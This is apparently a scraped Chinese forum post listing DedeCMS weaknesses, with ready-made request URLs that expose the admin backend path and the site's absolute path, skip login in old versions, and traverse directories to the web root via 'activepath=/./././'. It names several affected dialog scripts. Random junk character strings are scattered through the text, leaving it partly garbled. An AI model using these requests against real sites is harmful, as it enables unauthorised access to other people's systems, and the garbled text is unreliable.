1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
6 ]2 x1 m! _$ u- u$ M5 a- P
8 b4 ]5 P- ^7 [, ]* \/ ] F- d& h员帐号,新版本的就直接转向了后台.
' u$ F& \( `- [
2 z5 _% u4 N+ D" |2 _6 w2.include/dialog/config.php会爆出后台管理路径
9 o5 y# R) q% u
A8 r2 e* O* B: x1 T! E9 Q3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录3 d% T6 w( M0 K4 B1 Q- _
1 X- m1 I8 Q. }8 i' _4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.! }; ~( a$ S. v" O# f
8 m3 |% E$ |6 E$ I5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
; q: u: k6 w2 O
5 L' x: y$ k! p( o% I/ k) ~7 Y1 d到根目录去.不过这些版本的访问地址有些不同.0 |9 s$ C6 A6 }
地址为require/dialog/select_soft.php?activepath=/././././././././% l8 k: d( ]+ E2 a8 ?) Y4 a
4 l0 J$ o |7 {5 K5 s3 e+ H6 W4 S
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..8 B3 X7 q, L6 Q) F, U$ T1 S) B
存在相同问题的文件还有# z% j5 [ s5 C6 x# Z
include\dialog\select_images.php
n5 v7 x5 S& @' i; O- pinclude\dialog\select_media.php
. a; c: l" K2 q' ?9 L, w6 Cinclude\dialog\select_templets.php
^5 q. o8 u/ u9 f+ C# p8 l4 d |